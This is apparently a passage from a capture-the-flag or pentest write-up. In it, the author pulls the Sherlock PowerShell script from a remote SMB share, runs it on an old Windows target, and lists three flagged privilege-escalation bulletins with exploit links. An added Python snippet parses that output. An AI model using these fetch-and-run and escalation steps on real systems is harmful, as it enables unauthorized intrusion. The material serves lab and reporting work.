Sherlock


PEAS was not able to execute the embedded Watson, likely due to the machine being really old, so I will go with Sherlock, which is the predecessor of Watson.

ps c:\tmp> copy \\10.10.14.6\smb\Sherlock.ps1 .
ps c:\tmp> . .\Sherlock.ps1
ps c:\tmp> Find-AllVulns
 
[...REDACTED...]
 
title      : Secondary Logon Handle
msbulletin : MS16-032
cveid      : 2016-0099
link       : https://www.exploit-db.com/exploits/39719/
vulnstatus : Appears Vulnerable
 
title      : Windows Kernel-Mode Drivers EoP
msbulletin : MS16-034
cveid      : 2016-0093/94/95/96
link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
vulnstatus : Appears Vulnerable
 
title      : Win32k Elevation of Privilege
msbulletin : MS16-135
cveid      : 2016-7255
link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
vulnstatus : Appears Vulnerable
 

Sherlock found a total of 3 vulnerabilities:

  • MS16-032 (CVE-2016-0099)
  • MS16-034 (CVE-2016-0093/94/95/96)
  • MS16-135 (CVE-2016-7255)
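
For the report and the patch list, saved Sherlock output in the layout shown above can be turned into bulletin and full CVE identifiers, including the "0093/94/95/96" shorthand. This is an added example, not part of Sherlock or of the original notes; the function names and the sample text (with a made-up MS00-000 entry) are constructed for illustration.

```python
import re

# Constructed sample: Sherlock records in the layout shown above (links omitted).
SAMPLE = """\
title      : Secondary Logon Handle
msbulletin : MS16-032
cveid      : 2016-0099
vulnstatus : Appears Vulnerable

title      : Windows Kernel-Mode Drivers EoP
msbulletin : MS16-034
cveid      : 2016-0093/94/95/96
vulnstatus : Appears Vulnerable

title      : Example Patched Entry
msbulletin : MS00-000
cveid      : 2000-0001
vulnstatus : Not Vulnerable
"""

def parse_records(text):
    """Split 'key : value' blocks separated by blank lines into dicts."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            key, sep, value = line.partition(":")  # first colon only, so URLs survive
            if sep:
                rec[key.strip().lower()] = value.strip()
        if rec:
            records.append(rec)
    return records

def expand_cves(cveid):
    """Expand Sherlock shorthand such as '2016-0093/94/95/96' into full CVE IDs."""
    first, *rest = cveid.split("/")
    year, number = first.split("-")
    ids = [number] + [number[:len(number) - len(s)] + s for s in rest]
    return [f"CVE-{year}-{n}" for n in ids]

def flagged(text):
    """Return (bulletin, [CVE IDs]) for every record marked 'Appears Vulnerable'."""
    return [(r["msbulletin"], expand_cves(r["cveid"]))
            for r in parse_records(text)
            if r.get("vulnstatus") == "Appears Vulnerable"]

if __name__ == "__main__":
    for bulletin, cves in flagged(SAMPLE):
        print(bulletin, ", ".join(cves))
```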